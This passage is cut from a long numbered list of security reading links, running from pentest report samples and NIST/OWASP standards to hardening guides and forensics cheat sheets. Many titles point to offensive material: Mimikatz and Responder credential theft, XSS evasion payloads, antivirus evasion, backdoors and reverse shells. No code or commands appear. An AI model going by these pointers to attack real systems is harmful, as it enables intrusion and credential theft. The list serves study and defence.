https://tbgsecurity.com/wordpress/wp-content/uploads/2016/11/Sample-Penetration-Test-Report.pdf -1307-Nessus sample reports: https://www.tenable.com/products/nessus/sample-reports -1308-Sample penetration testing report: https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf -1309-jonh-the-ripper-cheat-sheet: https://countuponsecurity.com/2015/06/14/jonh-the-ripper-cheat-sheet/ -1310-ultimate guide to cracking foreign character passwords using hashcat: http://www.netmux.com/blog/ultimate-guide-to-cracking-foreign-character-passwords-using-has -1311-Building_a_Password_Cracking_Rig_for_Hashcat_-_Part_III: https://www.unix-ninja.com/p/Building_a_Password_Cracking_Rig_for_Hashcat_-_Part_III -1312-cracking story how i cracked over 122 million sha1 and md5 hashed passwords: http://blog.thireus.com/cracking-story-how-i-cracked-over-122-million-sha1-and-md5-hashed-passwords/ -1313-CSA (Cloud Security Alliance) Security White Papers: https://cloudsecurityalliance.org/download/ -1314-NIST Security Considerations in the System Development Life Cycle: https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-64r2.pdf -1315-ISO 29100 information technology security techniques privacy framework: https://www.iso.org/standard/45123.html -1316-NIST National Checklist Program: https://nvd.nist.gov/ncp/repository -1317-OWASP Guide to Cryptography: https://www.owasp.org/index.php/Guide_to_Cryptography -1318-NVD (National Vulnerability Database): https://nvd.nist.gov/ -1319-CVE details: https://cvedetails.com/ -1320-CIS Cybersecurity Tools: https://www.cisecurity.org/cybersecurity-tools/ -1321-Security aspects of virtualization by ENISA: https://www.enisa.europa.eu/publications/security-aspects-of-virtualization/ -1322-CIS Benchmarks also provides a security guide for VMware, Docker, and Kubernetes: https://www.cisecurity.org/cis-benchmarks/ -1323-OpenStack's hardening of the virtualization layer provides a secure guide to building the virtualization layer: https://docs.openstack.org/security-guide/compute/hardening-the-virtualization-layers.html -1324-Docker security: https://docs.docker.com/engine/security/security/ -1325-Microsoft Security Development Lifecycle: http://www.microsoft.com/en-us/SDL/ -1326-OWASP SAMM Project: https://www.owasp.org/index.php/OWASP_SAMM_Project -1327-CWE/SANS Top 25 Most Dangerous Software Errors: https://cwe.mitre.org/top25/ -1329-OWASP Vulnerable Web Applications Directory Project: https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project -1330-CERT Secure Coding Standards: https://wiki.sei.cmu.edu/confluence/display/seccode/SEI+CERT+Coding+Standards -1331-NIST Special Publication 800-53: https://nvd.nist.gov/800-53 -1332-SAFECode Security White Papers: https://safecode.org/publications/ -1333-Microsoft Threat Modeling tool 2016: https://aka.ms/tmt2016/ -1334-Apache Metron for real-time big data security: http://metron.apache.org/documentation/ -1335-Introducing OCTAVE Allegro: Improving the Information Security Risk Assessment Process: https://resources.sei.cmu.edu/asset_files/TechnicalReport/2007_005_001_14885.pdf -1336-NIST 800-18 Guide for Developing Security Plans for Federal Information Systems: http://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-18r1.pdf -1337-ITU-T X.805 (10/2003) Security architecture for systems providing end- to-end communications: https://www.itu.int/rec/dologin_pub.asp?lang=e&id=T-REC-X.805-200310-I!!PDF-E&type=items -1338-ETSI TS 102 165-1 V4.2.1 (2006-12) : Method and proforma for Threat, Risk, Vulnerability Analysis: http://www.etsi.org/deliver/etsi_ts/102100_102199/10216501/04.02.01_60/ts_10216501v040201p.pdf -1339-SAFECode Fundamental Practices for Secure Software Development: https://safecode.org/wp-content/uploads/2018/03/SAFECode_Fundamental_Practices_for_Secure_Software_Development_March_2018.pdf -1340-NIST 800-64 Security Considerations in the System Development Life Cycle: https://csrc.nist.gov/publications/detail/sp/800-64/rev-2/final -1341-SANS A Security Checklist for Web Application Design: https://www.sans.org/reading-room/whitepapers/securecode/security-checklist-web-application-design-1389 -1342-Best Practices for implementing a Security Awareness Program: https://www.pcisecuritystandards.org/documents/PCI_DSS_V1.0_Best_Practices_for_Implementing_Security_Awareness_Program.pdf -1343-ETSI TS 102 165-1 V4.2.1 (2006-12): Method and proforma for Threat, Risk, Vulnerability Analysis: http://www.etsi.org/deliver/etsi_ts/102100_102199/10216501/04.02.03_60/ts_10216501v040203p.pdf -1344-NIST 800-18 Guide for Developing Security Plans for Federal Information Systems: https://csrc.nist.gov/publications/detail/sp/800-18/rev-1/final -1345-SafeCode Tactical Threat Modeling: https://safecode.org/safecodepublications/tactical-threat-modeling/ -1346-SANS Web Application Security Design Checklist: https://www.sans.org/reading-room/whitepapers/securecode/security-checklist-web-application-design-1389 -1347-Data Anonymization for production data dumps: https://github.com/sunitparekh/data-anonymization -1348-SANS Continuous Monitoring—What It Is, Why It Is Needed, and How to Use It: https://www.sans.org/reading-room/whitepapers/analyst/continuous-monitoring-is-needed-35030 -1349-Guide to Computer Security Log Management: https://ws680.nist.gov/publication/get_pdf.cfm?pub_id=50881 -1350-Malware Indicators: https://github.com/citizenlab/malware-indicators -1351-OSINT Threat Feeds: https://www.circl.lu/doc/misp/feed-osint/ -1352-SANS How to Use Threat Intelligence effectively: https://www.sans.org/reading-room/whitepapers/analyst/threat-intelligence-is-effectively-37282 -1353-NIST 800-150 Guide to Cyber Threat Information Sharing: https://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp.800-150.pdf -1354-Securing Web Application Technologies Checklist: https://software-security.sans.org/resources/swat -1355-Firmware Security Training: https://github.com/advanced-threat-research/firmware-security-training -1356-Burp Suite Bootcamp: https://pastebin.com/5sG7Rpg5 -1357-Web app hacking: https://pastebin.com/ANsw7WRx -1358-XSS Payload: https://pastebin.com/EdxzE4P1 -1359-XSS Filter Evasion Cheat Sheet: https://pastebin.com/bUutGfSy -1360-Persistence using RunOnceEx – Hidden from Autoruns.exe: https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ -1361-Windows Operating System Archaeology: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology -1362-How to Backdoor Windows 10 Using an Android Phone & USB Rubber Ducky: https://www.prodefence.org/how-to-backdoor-windows-10-using-an-android-phone-usb-rubber-ducky/ -1363-Malware Analysis using Osquery : https://hackernoon.com/malware-analysis-using-osquery-part-2-69f08ec2ecec -1364-Tales of a Blue Teamer: Detecting Powershell Empire shenanigans with Sysinternals : https://holdmybeersecurity.com/2019/02/27/sysinternals-for-windows-incident-response/ -1365-Userland registry hijacking: https://3gstudent.github.io/Userland-registry-hijacking/ -1366-Malware Hiding Techniques to Watch for: AlienVault Labs: https://www.alienvault.com/blogs/labs-research/malware-hiding-techniques-to-watch-for-alienvault-labs -1367- Full text of "Google hacking for penetration testers" : https://archive.org/stream/pdfy-TPtNL6_ERVnbod0r/Google+Hacking+-+For+Penetration+Tester_djvu.txt -1368- Full text of "Long, Johnny Google Hacking For Penetration Testers" : https://archive.org/stream/LongJohnnyGoogleHackingForPenetrationTesters/Long%2C%20Johnny%20-%20Google%20Hacking%20for%20Penetration%20Testers_djvu.txt -1369- Full text of "Coding For Penetration Testers" : https://archive.org/stream/CodingForPenetrationTesters/Coding%20for%20Penetration%20Testers_djvu.txt -1370- Full text of "Hacking For Dummies" : https://archive.org/stream/HackingForDummies/Hacking%20For%20Dummies_djvu.txt -1371-Full text of "Wiley. Hacking. 5th. Edition. Jan. 2016. ISBN. 1119154685. Profescience.blogspot.com" : https://archive.org/stream/Wiley.Hacking.5th.Edition.Jan.2016.ISBN.1119154685.Profescience.blogspot.com/Wiley.Hacking.5th.Edition.Jan.2016.ISBN.1119154685.Profescience.blogspot.com_djvu.txt -1372- Full text of "Social Engineering The Art Of Human Hacking" : https://archive.org/stream/SocialEngineeringTheArtOfHumanHacking/Social%20Engineering%20-%20The%20Art%20of%20Human%20Hacking_djvu.txt -1373- Full text of "CYBER WARFARE" : https://archive.org/stream/CYBERWARFARE/CYBER%20WARFARE_djvu.txt -1374-Full text of "NSA DOCID: 4046925 Untangling The Web: A Guide To Internet Research" : https://archive.org/stream/Untangling_the_Web/Untangling_the_Web_djvu.txt -1375- Full text of "sectools" : https://archive.org/stream/sectools/hack-the-stack-network-security_djvu.txt -1376- Full text of "Aggressive network self-defense" : https://archive.org/stream/pdfy-YNtvDJueGZb1DCDA/Aggressive%20Network%20Self-Defense_djvu.txt -1377-Community Texts: https://archive.org/details/opensource?and%5B%5D=%28language%3Aeng+OR+language%3A%22English%22%29+AND+subject%3A%22google%22 -1378- Full text of "Cyber Spying - Tracking (sometimes).PDF (PDFy mirror)" : https://archive.org/stream/pdfy-5-Ln_yPZ22ondBJ8/Cyber%20Spying%20-%20Tracking%20%28sometimes%29_djvu.txt -1379- Full text of "Enzyclopedia Of Cybercrime" : https://archive.org/stream/EnzyclopediaOfCybercrime/Enzyclopedia%20Of%20Cybercrime_djvu.txt -1380- Full text of "Information Security Management Handbook" : https://archive.org/stream/InformationSecurityManagementHandbook/Information%20Security%20Management%20Handbook_djvu.txt -1381- Full text of "ARMArchitecture Reference Manual" : https://archive.org/stream/ARMArchitectureReferenceManual/DetectionOfIntrusionsAndMalwareAndVulnerabilityAssessment2016_djvu.txt -1382- Full text of "Metasploit The Penetration Tester S Guide" : https://archive.org/stream/MetasploitThePenetrationTesterSGuide/Metasploit-The+Penetration+Tester+s+Guide_djvu.txt -1383-Tips & tricks to master Google’s search engine: https://medium.com/infosec-adventures/google-hacking-39599373be7d -1384-Ethical Google Hacking - Sensitive Doc Dork (Part 2) : https://securing-the-stack.teachable.com/courses/ethical-google-hacking-1/lectures/3877866 -1385- Google Hacking Secrets:the Hidden Codes of Google : https://www.ma-no.org/en/security/google-hacking-secrets-the-hidden-codes-of-google -1386-google hacking: https://www.slideshare.net/SamNizam/3-google-hacking -1387-How Penetration Testers Use Google Hacking: https://www.cqure.nl/kennisplatform/how-penetration-testers-use-google-hacking -1388-Free Automated Malware Analysis Sandboxes and Services: https://zeltser.com/automated-malware-analysis/ -1389-How to get started with Malware Analysis and Reverse Engineering: https://0ffset.net/miscellaneous/how-to-get-started-with-malware-analysis/ -1390-Handy Tools And Websites For Malware Analysis: https://www.informationsecuritybuzz.com/articles/handy-tools-and-websites/ -1391-Dynamic Malware Analysis: https://prasannamundas.com/share/dynamic-malware-analysis/ -1392-Intro to Radare2 for Malware Analysis: https://malwology.com/2018/11/30/intro-to-radare2-for-malware-analysis/ -1393-Detecting malware through static and dynamic techniques: https://technical.nttsecurity.com/.../detecting-malware-through-static-and-dynamic-tec... -1394-Malware Analysis Tutorial : Tricks for Confusing Static Analysis Tools: https://www.prodefence.org/malware-analysis-tutorial-tricks-confusing-static-analysis-tools -1395-Malware Analysis Lab At Home In 5 Steps: https://ethicalhackingguru.com/malware-analysis-lab-at-home-in-5-steps/ -1396-Malware Forensics Guide - Static and Dynamic Approach: https://www.yeahhub.com/malware-forensics-guide-static-dynamic-approach/ -1397-Top 30 Bug Bounty Programs in 2019: https://www.guru99.com/bug-bounty-programs.html -1398-Introduction - Book of BugBounty Tips: https://gowsundar.gitbook.io/book-of-bugbounty-tips/ -1399-List of bug bounty writeups: https://pentester.land/list-of-bug-bounty-writeups.html -1400-Tips From A Bugbounty Hunter: https://www.secjuice.com/bugbounty-hunter/ -1401-Cross Site Scripting (XSS) - Book of BugBounty Tips: https://gowsundar.gitbook.io/book-of-bugbounty-tips/cross-site-scripting-xss -1402-BugBountyTips: https://null0xp.wordpress.com/tag/bugbountytips/ -1403-Xss Filter Bypass Payloads: www.oroazteca.net/mq67/xss-filter-bypass-payloads.html -1404-Bug Bounty Methodology: https://eforensicsmag.com/bug-bounty-methodology-ttp-tacticstechniques-and-procedures-v-2-0 -1405-GDB cheat-sheet for exploit development: www.mannulinux.org/2017/01/gdb-cheat-sheet-for-exploit-development.html -1406-A Study in Exploit Development - Part 1: Setup and Proof of Concept : https://www.anitian.com/a-study-in-exploit-development-part-1-setup-and-proof-of-concept -1407-Exploit development tutorial : https://www.computerweekly.com/tutorial/Exploit-development-tutorial-Part-Deux -1408-exploit code development: http://www.phreedom.org/presentations/exploit-code-development/exploit-code-development.pdf -1409-“Help Defeat Denial of Service Attacks: Step-by-Step”: http://www.sans.org/dosstep/ -1410-Internet Firewalls: Frequently Asked Questions: http://www.interhack.net/pubs/fwfaq/ -1411-Service Name and Transport Protocol Port Number: http://www.iana.org/assignments/port-numbers -1412-10 Useful Open Source Security Firewalls for Linux Systems: https://www.tecmint.com/open-source-security-firewalls-for-linux-systems/ -1413-40 Linux Server Hardening Security Tips: https://www.cyberciti.biz/tips/linux-security.html -1414-Linux hardening: A 15-step checklist for a secure Linux server : https://www.computerworld.com/.../linux-hardening-a-15-step-checklist-for-a-secure-linux-server -1415-25 Hardening Security Tips for Linux Servers: https://www.tecmint.com/linux-server-hardening-security-tips/ -1416-How to Harden Unix/Linux Systems & Close Security Gaps: https://www.beyondtrust.com/blog/entry/harden-unix-linux-systems-close-security-gaps -1417-34 Linux Server Security Tips & Checklists for Sysadmins: https://www.process.st/server-security/ -1418-Linux Hardening: https://www.slideshare.net/MichaelBoelen/linux-hardening -1419-23 Hardening Tips to Secure your Linux Server: https://www.rootusers.com/23-hardening-tips-to-secure-your-linux-server/ -1420-What is the Windows Registry? : https://www.computerhope.com/jargon/r/registry.htm -1421-Windows Registry, Everything You Need To Know: https://www.gammadyne.com/registry.htm -1422-Windows Registry Tutorial: https://www.akadia.com/services/windows_registry_tutorial.html -1423-5 Tools to Scan a Linux Server for Malware and Rootkits: https://www.tecmint.com/scan-linux-for-malware-and-rootkits/ -1424-Subdomain takeover dew to missconfigured project settings for Custom domain .: https://medium.com/bugbountywriteup/subdomain-takeover-dew-to-missconfigured-project-settings-for-custom-domain-46e90e702969 -1425-Massive Subdomains p0wned: https://medium.com/bugbountywriteup/massive-subdomains-p0wned-80374648336e -1426-Subdomain Takeover: Basics: https://0xpatrik.com/subdomain-takeover-basics/ -1427-Subdomain Takeover: Finding Candidates: https://0xpatrik.com/subdomain-takeover-candidates/ -1428-Bugcrowd's Domain & Subdomain Takeover!: https://bugbountypoc.com/bugcrowds-domain-takeover/ -1429-What Are Subdomain Takeovers, How to Test and Avoid Them?: https://dzone.com/articles/what-are-subdomain-takeovers-how-to-test-and-avoid -1430-Finding Candidates for Subdomain Takeovers: https://jarv.is/notes/finding-candidates-subdomain-takeovers/ -1431-Subdomain takeover of blog.snapchat.com: https://hackernoon.com/subdomain-takeover-of-blog-snapchat-com-60860de02fe7 -1432-Hostile Subdomain takeove: https://labs.detectify.com/tag/hostile-subdomain-takeover/ -1433-Microsoft Account Takeover Vulnerability Affecting 400 Million Users: https://www.safetydetective.com/blog/microsoft-outlook/ -1434-What is Subdomain Hijack/Takeover Vulnerability? How to Identify? & Exploit It?: https://blog.securitybreached.org/2017/10/11/what-is-subdomain-takeover-vulnerability/ -1435-Subdomain takeover detection with AQUATONE: https://michenriksen.com/blog/subdomain-takeover-detection-with-aquatone/ -1436-A hostile subdomain takeover! – Breaking application security: https://evilenigma.blog/2019/03/12/a-hostile-subdomain-takeover/ -1437-Web Development Reading List: https://www.smashingmagazine.com/2017/03/web-development-reading-list-172/ -1438-CSRF Attack can lead to Stored XSS: https://medium.com/bugbountywriteup/csrf-attack-can-lead-to-stored-xss-f40ba91f1e4f -1439-What is Mimikatz: The Beginner's Guide | Varonis: https://www.varonis.com/bog/what-is-mimikatz -1440-Preventing Mimikatz Attacks : https://medium.com/blue-team/preventing-mimikatz-attacks-ed283e7ebdd5 -1441-Mimikatz tutorial: How it hacks Windows passwords, credentials: https://searchsecurity.techtarget.com/.../Mimikatz-tutorial-How-it-hacks-Windows-passwords-credentials -1442-Mimikatz: Walkthrough [Updated 2019]: https://resources.infosecinstitute.com/mimikatz-walkthrough/ -1443-Mimikatz -Windows Tutorial for Beginner: https://hacknpentest.com/mimikatz-windows-tutorial-beginners-guide-part-1/ -1444-Mitigations against Mimikatz Style Attacks: https://isc.sans.edu/forums/diary/Mitigations+against+Mimikatz+Style+Attacks -1445-Exploring Mimikatz - Part 1 : https://blog.xpnsec.com/exploring-mimikatz-part-1/ -1446-Powershell AV Evasion. Running Mimikatz with PowerLine: https://jlajara.gitlab.io/posts/2019/01/27/Mimikatz-AV-Evasion.html -1447-How to Steal Windows Credentials with Mimikatz and Metasploit: https://www.hackingloops.com/mimikatz/ -1448-Retrieving NTLM Hashes without touching LSASS: https://www.andreafortuna.org/2018/03/26/retrieving-ntlm-hashes-without-touching-lsass-the-internal-monologue-attack/ -1449-From Responder to NT Authority\SYSTEM: https://medium.com/bugbountywriteup/from-responder-to-nt-authority-system-39abd3593319 -1450-Getting Creds via NTLMv2: https://0xdf.gitlab.io/2019/01/13/getting-net-ntlm-hases-from-windows.html -1451-Living off the land: stealing NetNTLM hashes: https://www.securify.nl/blog/SFY20180501/living-off-the-land_-stealing-netntlm-hashes.html -1452-(How To) Using Responder to capture passwords on a Windows: www.securityflux.com/?p=303 -1453-Pwning with Responder - A Pentester's Guide: https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/ -1454-LLMNR and NBT-NS Poisoning Using Responder: https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/ -1455-Responder - Ultimate Guide : https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/guide/ -1456-Responder - CheatSheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/ -1457-LM, NTLM, Net-NTLMv2, oh my! : https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4 -1458-SMB Relay Attack Tutorial: https://intrinium.com/smb-relay-attack-tutorial -1459-Cracking NTLMv2 responses captured using responder: https://zone13.io/post/cracking-ntlmv2-responses-captured-using-responder/ -1460-Skip Cracking Responder Hashes and Relay Them: https://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/ -1461-Metasploit's First Antivirus Evasion Modules: https://blog.rapid7.com/2018/10/09/introducing-metasploits-first-evasion-module/ -1462-Evading Anti-virus Part 1: Infecting EXEs with Shellter: https://www.hackingloops.com/evading-anti-virus-shellter/ -1463-Evading AV with Shellter: https://www.securityartwork.es/2018/11/02/evading-av-with-shellter-i-also-have-sysmon-and-wazuh-i/ -1464-Shellter-A Shellcode Injecting Tool : https://www.hackingarticles.in/shellter-a-shellcode-injecting-tool/ -1465-Bypassing antivirus programs using SHELLTER: https://myhackstuff.com/shellter-bypassing-antivirus-programs/ -1466-John the Ripper step-by-step tutorials for end-users : openwall.info/wiki/john/tutorials -1467-Beginners Guide for John the Ripper (Part 1): https://www.hackingarticles.in/beginner-guide-john-the-ripper-part-1/ -1468-John the Ripper Basics Tutorial: https://ultimatepeter.com/john-the-ripper-basics-tutorial/ -1469-Crack Windows password with john the ripper: https://www.securitynewspaper.com/2018/11/27/crack-windows-password-with-john-the-ripper/ -1470-Getting Started Cracking Password Hashes with John the Ripper : https://www.tunnelsup.com/getting-started-cracking-password-hashes/ -1471-Shell code exploit with Buffer overflow: https://medium.com/@jain.sm/shell-code-exploit-with-buffer-overflow-8d78cc11f89b -1472-Shellcoding for Linux and Windows Tutorial : www.vividmachines.com/shellcode/shellcode.html -1473-Buffer Overflow Practical Examples : https://0xrick.github.io/binary-exploitation/bof5/ -1474-Msfvenom shellcode analysis: https://snowscan.io/msfvenom-shellcode-analysis/ -1475-Process Continuation Shellcode: https://azeria-labs.com/process-continuation-shellcode/ -1476-Dynamic Shellcode Execution: https://www.countercept.com/blog/dynamic-shellcode-execution/ -1477-Tutorials: Writing shellcode to binary files: https://www.fuzzysecurity.com/tutorials/7.html -1478-Creating Shellcode for an Egg Hunter : https://securitychops.com/2018/05/26/slae-assignment-3-egghunter-shellcode.html -1479-How to: Shellcode to reverse bind a shell with netcat : www.hackerfall.com/story/shellcode-to-reverse-bind-a-shell-with-netcat -1480-Bashing the Bash — Replacing Shell Scripts with Python: https://medium.com/capital-one-tech/bashing-the-bash-replacing-shell-scripts-with-python-d8d201bc0989 -1481-How to See All Devices on Your Network With nmap on Linux: https://www.howtogeek.com/.../how-to-see-all-devices-on-your-network-with-nmap-on-linux -1482-A Complete Guide to Nmap: https://www.edureka.co/blog/nmap-tutorial/ -1483-Nmap from Beginner to Advanced : https://resources.infosecinstitute.com/nmap/ -1484-Using Wireshark: Identifying Hosts and Users: https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/ -1485-tshark tutorial and filter examples: https://hackertarget.com/tshark-tutorial-and-filter-examples/ -1486-Fuzz Testing(Fuzzing) Tutorial: What is, Types, Tools & Example: https://www.guru99.com/fuzz-testing.html -1487-Tutorial: Dumb Fuzzing - Peach Community Edition: community.peachfuzzer.com/v3/TutorialDumbFuzzing.html -1488-HowTo: ExploitDev Fuzzing: https://hansesecure.de/2018/03/howto-exploitdev-fuzzing/ -1489-Fuzzing with Metasploit: https://www.corelan.be/?s=fuzzing -1490-Fuzzing – how to find bugs automagically using AFL: 9livesdata.com/fuzzing-how-to-find-bugs-automagically-using-afl/ -1491-Introduction to File Format Fuzzing & Exploitation: https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3 -1492-0x3 Python Tutorial: Fuzzer: https://www.primalsecurity.net/0x3-python-tutorial-fuzzer/ -1493-Hunting For Bugs With AFL: https://research.aurainfosec.io/hunting-for-bugs-101/ -1494-Fuzzing: The New Unit Testing: https://www.slideshare.net/DmitryVyukov/fuzzing-the-new-unit-testing -1495-Fuzzing With Peach Framework: https://www.terminatio.org/fuzzing-peach-framework-full-tutorial-download/ -1496-How we found a tcpdump vulnerability using cloud fuzzing: https://www.softscheck.com/en/identifying-security-vulnerabilities-with-cloud-fuzzing/ -1497-Finding a Fuzzer: Peach Fuzzer vs. Sulley: https://medium.com/@jtpereyda/finding-a-fuzzer-peach-fuzzer-vs-sulley-1fcd6baebfd4 -1498-Android malware analysis: https://www.slideshare.net/rossja/android-malware-analysis-71109948 -1499-15+ Malware Analysis Tools & Techniques : https://www.template.net/business/tools/malware-analysis/ -1500-30 Online Malware Analysis Sandboxes / Static Analyzers: https://medium.com/@su13ym4n/15-online-sandboxes-for-malware-analysis-f8885ecb8a35 -1501-Linux Command Line Forensics and Intrusion Detection Cheat Sheet: https://www.sandflysecurity.com/blog/compromised-linux-cheat-sheet/ -1502-Cheat Sheets - SANS Digital Forensics: https://digital-forensics.sans.org/community/cheat-sheets -1503-Breach detection with Linux filesystem forensics: https://opensource.com/article/18/4/linux-filesystem-forensics -1504-Digital Forensics Cheat Sheets Collection : https://neverendingsecurity.wordpress.com/digital-forensics-cheat-sheets-collection/ -1505-Security Incident Survey Cheat Sheet for Server Administrators: https://zeltser.com/security-incident-survey-cheat-sheet/ -1506-Digital forensics: A cheat sheet : https://www.techrepublic.com/article/digital-forensics-the-smart-persons-guide/ -1507-Windows Registry Forensics using 'RegRipper' Command-Line on Linux: https://www.pinterest.cl/pin/794815034207804059/ -1508-Windows IR Live Forensics Cheat Sheet: https://www.cheatography.com/koriley/cheat-sheets/windows-ir-live-forensics/ -1509-10 Best Known Forensics Tools That Works on Linux: https://linoxide.com/linux-how-to/forensics-tools-linux/ -1510-Top 20 Free Digital Forensic Investigation Tools for SysAdmins: https://techtalk.gfi.com/top-20-free-digital-forensic-investigation-tools-for-sysadmins/ -1511-Windows Volatile Memory Acquisition & Forensics 2018: https://medium.com/@lucideus/windows-volatile-memory-acquisition-forensics-2018-lucideus-forensics-3f297d0e5bfd -1512-PowerShell Cheat Sheet : https://www.digitalforensics.com/blog/powershell-cheat-sheet-2/ -1513-Forensic Artifacts: evidences of program execution on Windows systems: https://www.andreafortuna.org/forensic-artifacts-evidences-of-program-execution-on-windows-systems -1514-How to install a CPU?: https://www.computer-hardware-explained.com/how-to-install-a-cpu.html -1515-How To Upgrade and Install a New CPU or Motherboard: https://www.howtogeek.com/.../how-to-upgrade-and-install-a-new-cpu-or-motherboard-or-both -1516-Installing and Troubleshooting CPUs: www.pearsonitcertification.com/articles/article.aspx?p=1681054&seqNum=2 -1517-15 FREE Pastebin Alternatives You Can Use Right Away: https://www.rootreport.com/pastebin-alternatives/ -1518-Basic computer troubleshooting steps: https://www.computerhope.com/basic.htm -1519-18 Best Websites to Learn Computer Troubleshooting and Tech support: http://transcosmos.co.uk/best-websites-to-learn-computer-troubleshooting-and-tech-support -1520-Post Exploitation with PowerShell Empire 2.3.0 : https://www.yeahhub.com/post-exploitation-powershell-empire-2-3-0-detailed-tutorial/ -1521-Windows Persistence with PowerShell Empire : https://www.hackingarticles.in/windows-persistence-with-powershell-empire/ -1522-powershell-empire-tutorials-empire-to-meterpreter-shellcode-injection-ssl-tutorial: https://www.dudeworks.com/powershell-empire-tutorials-empire-to-meterpreter-shellcode-injection-ssl-tutorial -1523-Bypassing Anti-Virtus & Hacking Windows 10 Using Empire : https://zsecurity.org/bypassing-anti-virtus-hacking-windows-10-using-empire/ -1524-Hacking with Empire – PowerShell Post-Exploitation Agent : https://www.prodefence.org/hacking-with-empire-powershell-post-exploitation-agent/ -1525-Hacking Windows Active Directory Full guide: www.kalitut.com/hacking-windows-active-directory-full.html -1526-PowerShell Empire for Post-Exploitation: https://www.hackingloops.com/powershell-empire/ -1527-Generate A One-Liner – Welcome To LinuxPhilosophy!: linuxphilosophy.com/rtfm/more/empire/generate-a-one-liner/ -1528-CrackMapExec - Ultimate Guide: https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/ -1529-PowerShell Logging and Security: https://www.secjuice.com/enterprise-powershell-protection-logging/ -1530-Create your own FUD Backdoors with Empire: http://blog.extremehacking.org/blog/2016/08/25/create-fud-backdoors-empire/ -1531-PowerShell Empire Complete Tutorial For Beginners: https://video.hacking.reviews/2019/06/powershell-empire-complete-tutorial-for.html -1532-Bash Bunny: Windows Remote Shell using Metasploit & PowerShell: https://cyberarms.wordpress.com/.../bash-bunny-windows-remote-shell-using-metasploit-powershell -1533-Kerberoasting - Stealing Service Account Credentials: https://www.scip.ch/en/?labs.20181011 -1534-Automating Mimikatz with Empire and DeathStar : https://blog.stealthbits.com/automating-mimikatz-with-empire-and-deathstar/ -1535-Windows oneliners to get shell : https://ironhackers.es/en/cheatsheet/comandos-en-windows-para-obtener-shell/ -1536-ObfuscatedEmpire : https://cobbr.io/ObfuscatedEmpire.html -1537-Pentesting with PowerShell in six steps: https://periciacomputacional.com/pentesting-with-powershell-in-six-steps/ -1538-Using Credentials to Own Windows Boxes - Part 3 (WMI and WinRM): https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm -1539-PowerShell Security Best Practices: https://www.digitalshadows.com/blog-and-research/powershell-security-best-practices/ -1540-You can detect PowerShell attacks: https://www.slideshare.net/Hackerhurricane/you-can-detect-powershell-attacks -1541-Detecting and Preventing PowerShell Attacks: https://www.eventsentry.com/.../powershell-pw3rh311-detecting-preventing-powershell-attacks -1542-Detecting Offensive PowerShell Attack Tools – Active Directory Security: https://adsecurity.org/?p=2604 -1543-An Internal Pentest Audit Against Active Directory: https://www.exploit-db.com/docs/46019 -1544-A complete Active Directory Penetration Testing Checklist : https://gbhackers.com/active-directory-penetration-testing-checklist/ -1545-Active Directory | Penetration Testing Lab: https://pentestlab.blog/tag/active-directory/ -1546-Building and Attacking an Active Directory lab with PowerShell : https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell -1547-Penetration Testing in Windows Server Active Directory using Metasploit: https://www.hackingarticles.in/penetration-testing-windows-server-active-directory-using-metasploit-part-1 -1548-Red Team Penetration Testing – Going All the Way (Part 2 of 3) : https://www.anitian.com/red-team-testing-going-all-the-way-part2/ -1549-Penetration Testing Active Directory, Part II: https://www.jishuwen.com/d/2Mtq -1550-Gaining Domain Admin from Outside Active Directory: https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html -1551-Post Exploitation Cheat Sheet: https://0xsecurity.com/blog/some-hacking-techniques/post-exploitation-cheat-sheet -1552-Windows post-exploitation : https://github.com/emilyanncr/Windows-Post-Exploitation -1553-OSCP - Windows Post Exploitation : https://hackingandsecurity.blogspot.com/2017/9/oscp-windows-post-exploitation.html -1554-Windows Post-Exploitation Command List: http://pentest.tonyng.net/windows-post-exploitation-command-list/ -1555-Windows Post-Exploitation Command List: http://tim3warri0r.blogspot.com/2012/09/windows-post-exploitation-command-list.html -1556-Linux Post-Exploitation · OSCP - Useful Resources: https://backdoorshell.gitbooks.io/oscp-useful-links/content/linux-post-exploitation.html -1557-Pentesting Cheatsheet: https://anhtai.me/pentesting-cheatsheet/ -1558-Pentesting Cheatsheets - Red Teaming Experiments: https://ired.team/offensive-security-experiments/offensive-security-cheetsheets -1559-OSCP Goldmine: http://0xc0ffee.io/blog/OSCP-Goldmine -1560-Linux Post Exploitation Cheat Sheet: http://red-orbita.com/?p=8455 -1562-OSCP useful resources and tools: https://acknak.fr/en/articles/oscp-tools/ -1563-Windows Post-Exploitation Command List : https://es.scribd.com/document/100182787/Windows-Post-Exploitation-Command-List -1564-Metasploit Cheat Sheet: https://pentesttools.net/metasploit-cheat-sheet/ -1565-Windows Privilege Escalation: https://awansec.com/windows-priv-esc.html -1566-Linux Unix Bsd Post Exploitation: https://attackerkb.com/Unix/LinuxUnixBSD_Post_Exploitation -1567-Privilege Escalation & Post-Exploitation: https://movaxbx.ru/2018/09/16/privilege-escalation-post-exploitation/ -1568-Metasploit Cheat Sheet: https://vk-intel.org/2016/12/28/metasploit-cheat-sheet/ -1569-Metasploit Cheat Sheet : https://nitesculucian.github.io/2018/12/01/metasploit-cheat-sheet/ -1570-Privilege escalation: Linux: https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux -1571-Cheat Sheets — Amethyst Security: https://www.ssddcyber.com/cheatsheets -1572-Responder - CheatSheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/ -1573-Cheatsheets: 